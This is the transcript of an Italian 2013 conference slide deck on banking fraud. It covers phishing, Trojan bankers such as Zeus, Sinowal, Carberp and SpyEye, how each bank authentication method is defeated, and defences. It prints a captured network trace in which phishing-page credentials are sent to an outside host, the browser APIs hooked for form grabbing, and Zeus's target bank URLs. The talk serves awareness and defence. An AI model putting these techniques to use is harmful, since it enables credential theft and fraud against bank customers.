Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si...

Stato dell’arte delle truffe bancarie dal

phishing ai Trojan.Banker, come si

diffonde e come ci si difende

Relatori: ing. Gianfranco Tonello, Roberto Spagliccia Milano, 23/10/2013

mercoledì 23 ottobre alle ore 13:00sala Arena Trade - Pad. 1

Frode informatica

«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 2

25 Maggio 2012: fonte «Il Mattino di Padova»http://mattinopadova.gelocal.it/cronaca/2012/05/25/news/frode-informatica-ripulito-il-conto-degli-avvocati-di-padova-1.5154231

PhishingTrojan

Banker

A xe sta ea

segretaria!

Ogni riferimento a

persone o fatti è puramente

casuale

Frodi bancarie: tecniche utilizzate

• Phishing: si intende una tecnica attraverso la quale un soggetto malintenzionato (chiamato phisher), riesce a raccogliere dati personali di accesso, tramite tecniche di ingegneria sociale che negli anni si sono fatte sempre più raffinate.

• Trojan Banker: malware in grado di rubare le credenziali di accesso alla propria banca, modificando le schermate di login dei più diffusi siti di home banking.

3

Scopo: rubare denaro dal conto corrente eseguendo bonifici su conti esteri.

«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»

Frodi bancarie: Phishing

La tecnica è quella di inviare email relative al proprio conto corrente, nelle quali si invita il destinatario ad accedere immediatamente al proprio conto, per verificare i propri dati oppure per convalidare vincite o premi che l’istituto ha deciso di erogare.

4«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»

Phishing con link fraudolento 1/2

5

Link:

http://gfsrtdrhqptyszmvs.siamsensationsthai.com/my/gfsrtdrhqptyszmvs.asp?e=<email>

http://siamsensationsthai.com


Phishing con link fraudolento 2/2

6«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»

Phishing con allegato 1/3

7

Allegato

Document-poste-it.html



8

Sorgente della pagina: Document-poste-it.html

Nome utente Pluto Paperino

Password paperopoli

Cod. fiscale pltppr73b08g224y

Num. carta 4012 0526 7849 4512



9

Analisi traffico di rete

[TCP Porta: 80 SEND src 192.168.1.39 -> dst 85.214.122.107 Len=711 Seq=0x37461cb3 Ack=0xa5b319fc ACK Flags=0x18]POST /ac.php HTTP/1.1Host: zimmerers.de

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0[..]

Content-Type: application/x-www-form-urlencodedContent-Length: 165

utente=Pluto+Paperino&password=paperopoli&codice=pltppr73b08g224y&card1=4012&card2=0526&card3=7849&card4=4512&mese=10&anno=2015&cvv2=941&btn_login.x=36&btn_login.y=8

[TCP Porta: 80 RECEIVE src 85.214.122.107 -> dst 192.168.1.39 Len=203 Seq=0xa5b319fc Ack=0x37461f7a ACK Flags=0x18]HTTP/1.1 302 FoundDate: Mon, 07 Oct 2013 13:31:29 GMTServer: ApacheLocation: http://poste.it[..]

[TCP Porta: 80 SEND src 192.168.1.39 -> dst 62.241.4.35 Len=414 Seq=0x3a538eb3 Ack=0xae867f70 ACK Flags=0x18]GET / HTTP/1.1Host: poste.itUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0[..]


Phishing: statistiche gennaio – marzo 2013

10

Fonte: Phishing Activity Trends Report 1st Quarter 2013 www.apwg.org

• I siti di phishing sono diminuiti del 20% dal 4° trim. 2012 al 1°trim. 2013

• Le segnalazioni di phishing sono diminuite del 31% da gennaio a marzo 2013

Siti di Phishing - Marzo 2013

Stati Uniti 53,18% Francia 2,38%

Germania 7,40% Russia 2,34%

UK 4,21% Brasile 2,33%

Canada 4,15% Lituania 1,29%

Turchia 3,81% Olanda 1,26%


• Aut. a senso unico: Username e password statiche con tastiera fisica/virtuale

• Autenticazione a due fattori: Gridcard e TAN (Transaction Access Number)

• Autenticazione a due fattori: One Time password (OTP)

• Autenticazione a due fattori: OTP via SMS

• Autenticazione a due fattori: OTP via lettore di Smart Card (smart tan)

Autenticazione nell’home banking


Aut. a senso unico: tastiera fisica


Descrizione La password è una parola segreta o una stringa di caratteri usata per l’autenticazione. Con statica intendiamo una password costante, che non cambierà nel tempo, a meno che non venga aggiornata. La password viene inserita nel campo «textbox» dell’HTML attraverso la tastiera hardware o virtuale.

Come viene sconfitta I trojan banker possono memorizzare la password attraverso 2 tecniche: keylogging e form grabbing.Un keylogger può memorizzare ogni tasto premuto dall’utente, ma non è in grado di catturare la clipboard. L’utente può memorizzare le sue credenziali in un file e fare un «copia e incolla» per semplicità o per motivi di sicurezza.La tecnica del form grabbing consiste nell’intercettare le richieste API nel browser e memorizzare i dati del web form prima che siano passate ad internet.

Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker

Aut. a senso unico: tastiera virtuale


Descrizione La tastiera virtuale è stata introdotta in risposta al keylogging e form grabbing. Consiste nel creare una tastiera virtuale sullo schermo con una disposizione casuale dei tasti.

Come viene sconfitta I trojan banker possono memorizzare l’area dell’immagine del tasto premuto oppure registrare un video della sequenza dei tasti premuti. Questo tipo attacco memorizza le informazioni in remoto per essere interpretate successivamente.

Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker con funzionalità screen shot capturing. Non fornisce miglioramenti in termini di sicurezza rispetto alla textbox.

Autenticazione a due fattori: Gridcard e TAN

(Transaction Access Number)


Descrizione La grid card è una tabella o griglia che contiene di solito 50 codici alfanumerici. Il sistema della grid card può richiedere lo stesso codice più volte.La TAN (Transaction Access Number) è similare alla grid card, contiene una lista di codici.

Come viene sconfitta I trojan banker possono catturare un codice della grid card o TAN, e di eseguire una disposizione bancaria reiterata fino a che non viene richiesto il codice catturato.

Valutazione dei rischi È vulnerabile a Trojan Banker. Questa soluzione non migliora la sicurezza contro keylogger o form grabber.

Inserire il codice

C2 F4 H5

K V M

Autenticazione a due fattori: One Time

password (OTP)


Descrizione L’OTP (one time password) è una password che è valida solo per una sessione o disposizione. Gli OTP sono basati su algoritmi crittografici One-way e utilizzano chiavi differenti per ogni utente. Ogni OTP utilizzato viene cancellato o messo in una blacklist per non essere utilizzato una seconda volta. Le OTP sono valide solo per un breve periodo di tempo.

Come viene sconfitta I trojan banker possono catturare l’OTP e bloccare l’inoltro alla banca, segnalando all’utente un’errata autenticazione all’home banking. Nel tempo di vita dell’OTP, il trojan banker ha tutte le informazioni necessarie per eseguire una disposizione.

Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati». Questa soluzione è vulnerabile all’HTML injection e ad altre tecniche.

Autenticazione a due fattori: OTP via SMS


Descrizione L’OTP (one time password) viene inviata attraverso un SMS. L’OTP è associato alla disposizione da eseguire.

Come viene sconfitta La componente mobile del trojan banker può leggere l’SMS ricevuto e inoltrare il token OTP contenuto ad un server remoto. In questo modo il trojan banker ha tutte le informazioni necessarie per completare l’esecuzione della disposizione.

Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati» che utilizzano componenti mobile. Questa soluzione è vulnerabile nell’intercettazione dell’SMS.

Esempio di SMS:Fineco – SMS gratuito.Bonifico 10,59 EUR a CC 00001023456 Pluto Paperino.Conferma con SMS PIN 217489 o inoltra questo SMS al *******

Autenticazione a due fattori: OTP via

lettore di Smart Card (smart tan)


Descrizione Quando viene eseguita una disposizione, il sito della banca mostrerà un codice relativo a quella transazione.Il codice indicato a video dovrà essere inserito nel lettore di smart card, inserendo prima la carta di credito e il suo relativo PIN, e poi digitando il codice indicato dalla banca.In risposta, il lettore restituirà un OTP necessario per concludere l’operazione dispositiva sul sito.

Come viene sconfitta Il Trojan Banker modifica in modo silente la destinazione della disposizione autorizzata, grazie ad un attacco man-in-the-middle, senza che l’utente se ne accorga.

Valutazione dei rischi Molto sicuro, ma è vulnerabile a Trojan Banker che modificano la destinazione della transazione.

Tecniche dei Trojan Banker 1/2


Trojan Banker

Rubare le credenziali bancarie

Modificare la destinazione della

disposizione

Disposizione eseguita sul conto

del truffatore

Tecniche dei Trojan Banker 2/2

• Keylogging• Screen shot capturing• Browser protected storage• Redirect verso falsi siti bancari• VNC privata / Socks Proxy con Back Connect• Form grabbing (MITB)• SMS grabbing• Manipolazione automatica (passiva e attiva)• Android Banking App repacking


Form grabbing (MITB)

Internet Explorer

HttpSendRequest (wininet.dll)

HttpSendRequestEx (wininet.dll)

InternetReadFile (wininet.dll)

InternetReadFileEx (wininet.dll)

InternetQueryDataAvailable (wininet.dll)

InternetCloseHandle (wininet.dll)

EncryptMessage (secure32.dll)


Firefox

PR_Connect (nspr4.dll)

PR_Write (nspr4.dll)

PR_Read (nspr4.dll)

PR_Close (nspr4.dll)

Nspr4.dll

Malwaredll

injection

1

2

3

4Hooked API generiche

GetWindowText, TranslateMessage (user32.dll)

send, WSASend (ws2_32.dll)

Tutti i browser sono vulnerabili: IE, Firefox, Google Chrome, Opera, etc.

Frodi bancarie: Trojan Banker

• Zeus (ZBot – Citadel – ICE IX): file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware

• Sinowal: rootkit che infetta il Master Boot Record, metodo di diffusione siti infetti o installato da altri malware

• Trojan.Win32.Banker: file eseguibile che infetta il computer, metodo di diffusione via email

• Carberp / SpyEye / Gataka / IBANK : file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware


Zeus: Il primo trojan banker


Anno 2007

Nome file ntos.exe, oembios.exe, twext.exe, sdra64.exe

Caratteristiche Web fake; Keylogger; Screen shot capture; Browser protectedStorage; Form grabber: IE/Firefox; Web inject per Internet explorer; Socks proxy con back connection; VNC; Rubare certificati X.509Plugin venduti separatamente

Target Banche US, UK, IT, etc

Zeus: banche italiane sotto il mirino

https://www.gruppocarige.it/grps/vbank/jsp/login.jsp

https://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp

https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jspe

https://hb.quiubi.it/newSSO/x11logon.htm

https://www.iwbank.it/private/index_pub.jhtml*

https://web.secservizi.it/siteminderagent/forms/login.fcc

https://www.isideonline.it/relaxbanking/sso.Login


Elenco di alcuni siti di banche italiane trovato all’interno del file di configurazione di Zeus

Trojan Banker: esempi di web inject 1/2

24

Il trojan Banker modifica (lato client) la pagina di login della banca, richiedendo anche la password dispositiva. Gli autori del malwarepossono accedere al conto online della vittima e eseguire bonifici su conti esteri alla sua insaputa.


Trojan Banker: esempi di web inject 2/2

25

Altro esempio di Web Injection dove viene richiesta anche la password dispositiva.


Sinowal: plugin per Google Chrome


Anno 2008

Tipologia Infetta il Master Boot Record, installa plugin o moduli per rubare le credenziali bancarie

Plugin: Content.js; Plugin.dll; msseedir.dll; msdr.dll; lmbd.dll; wsse.dll; mmdd.dll; iexpgent64.dll (Nov. 2012 – ott. 2013)

Caratteristiche Google Chrome plugin; Form Post tracking

Target Banche NL

Sinowal: plugin per Google Chrome


Wvgimhukax.crx Content.js Plugin.dllTracciatura web

form

Wvgimhukax.crx

Plugin.dll

Content.js

Background.html

Manifest.json

Sinowal: default plugin -> content.js


Il «default plugin» utilizzato da Sinowal è costituito da 2 moduli:• Content.js• Plugin.dll

Il modulo javascriptmodifica il metodo POST per tutti i form caricati nella pagina web. In questo modo è in grado di leggere la password inserita nel form.

� Content.js

Frodi bancarie: Carberp e OTP


VIRUS

1

2

3

4

1. L’utente invia le sue credenziali di accesso alla banca: login, password, Pass-keyInternet banking (OTP = One Time Password).

2. Le credenziale vengono intercettate dal virus, che non le inoltra alla banca, ma le memorizza. Il virus visualizza un falso messaggio di inserimento errato di login/password

3. L’utente re-inserisce login/password e un nuovo valore della Pass-key Internet banking.

4. La Banca conferma la correttezza dei dati inseriti e l’utente accede al suo conto online

SpyEye: concorrente di Zeus


Anno 2010

Nome file Cleansweep.exe

Caratteristiche Web fake; Keylogger; Screen shot capture;Form grabber: POST / GET; Web inject; Socks proxy con back connection; Rubare certificati X.509Plugin venduti separatamenteTerminare «Zeus»

Target Bank of America, banche UK, US, etc

ZITMO: Zeus In The MObile


Spyeye-In-The-MObile:• Symbian

Login:Password:Num. di cellulare:Modello:

Zeus botnet

SMS:Scarica la seguente app o certificato di sicurezza: <link>

SMS Bank:PIN: <nnnn>

Bonifico eseguito sul conto del

truffatore

1 2

3

4

5

6

7

8

9

10

11

12

Zitmo:• Symbian• Android• Blackberry

Android Banking App: repacking


APK

decompilazioneAnalisi codice

Modifica del codice

compilazione

packing

Firmato con chiave privata

Google market o di terze parti

Sviluppatore

ricompilazione

repacking

Firmato con chiave privata

Malicious attacker

APK

Bonifico eseguito sul conto del

truffatore

1

2

3

4

5 6

Android Fineco App: esempio di repacking


com.fineco.it-1\com\fineco\it\datamodel\a\dx.smali

Android Fineco App: esempio di repacking


SMS:Func=json/G_LOGIN&userID=123&password=abc

Maggiori cause di infezione

• Navigazione su siti non raccomandabili

• Navigazione su siti attendibili ma che sono stati compromessi (infettati)

• Email con allegati infetti o link su siti infetti


Navigazione su siti non sicuri

• Molti siti poco attendibili includono nelle loro pagine script (principalmente JavaScript o Flash) che sono in grado di scaricare ed eseguire codice sul computer di chi lo sta visitando. Questo può essere tanto più dannoso quanto più alto è il livello di privilegi con il quale è eseguito il browser (ad esempio Administrator).

• Exploit kit: Black Hole, Cool Exploit (sfruttano vulnerabilità)

• Molto spesso questo tipo di siti include pubblicità

fraudolente, ingannevoli o banner pubblicitari che, se cliccati, portano ad altri siti infetti o al download di software dannoso


Black Hole: Vulnerabilità utilizzate

37

Vulnerabilità Descrizione

CVE-2013-0422 Java

CVE-2012-4681 Java

CVE-2012-1889 Windows

CVE-2012-1723 Java

CVE-2012-0507 Java

CVE-2011-3544 Java

CVE-2011-2110 Adobe Flash Player

CVE-2011-0611 Adobe Flash Player

CVE-2010-3552 Java

CVE-2010-1885 Windows

Vulnerabilità Descrizione

CVE-2010-1423 Java

CVE-2010-0886 Java

CVE-2010-0842 Java

CVE-2010-0840 Java

CVE-2010-0188 Adobe Reader

CVE-2009-1671 Java




CVE-2006-0003 Internet Explorer


Virus dell’email


Come mi difendo dai Malware

• Antivirus sempre aggiornato e installato su tutti i pc della rete

• Aggiornare: Windows, Java, Adobe Reader, Adobe Flash Player

• Avere buonsenso nell’uso del computer:

• Verificare la tipologia degli allegati che si salvano, una fattura non sarà di tipo Applicazione

• Verificare la destinazione dei link su cui si clicca


Conclusioni

• Banche e istituti di credito non richiedono mai la password via email

• Banche e istituti di credito non regalano premiin denaro, normalmente li chiedono!

• Phishing in calo, ma attenzione!

• Autenticazioni bancarie vulnerabili

• Trojan Banker sofisticati e evoluti


Domande


Autori

• Ing. Gianfranco Tonello ([email protected])

• Roberto Spagliccia ([email protected])

Grazie per l’attenzione


Referenze

• http://www.tgosft.it

• Phishing: un'attività che non passa mai di moda: http://www.tgsoft.it/italy/news_archivio.asp?id=408

• Phishing Activity Trends Report 1st Quarter 2013: http://www.apwg.org

• Home banking a rischio! Trojan.Win32.Banker.CS: la nuova frontiera del phishing: http://www.tgsoft.it/italy/news_archivio.asp?id=454

• http://www.tomsguide.com/us/factor-authentication-in-online-banking,review-678-5.html

• http://en.wikipedia.org/wiki/Transaction_authentication_number

• https://www.owasp.org/images/e/e4/AppsecEU09_The_Bank_in_The_Browser_Presentation_v1.1.pdf

• ZeuS Banking Trojan Report: http://www.secureworks.com/cyber-threat-intelligence/threats/zeus/

• SpyEye Malware Infection Framework – Virus Bulletin July 2011 (www.virusbtn.com)

• Mobile Banking Vulnerability: Android Repacking Threat – Virus Bulletin May 2012 (www.virusbtn.com)


Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si...

Software

Transcript of Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si...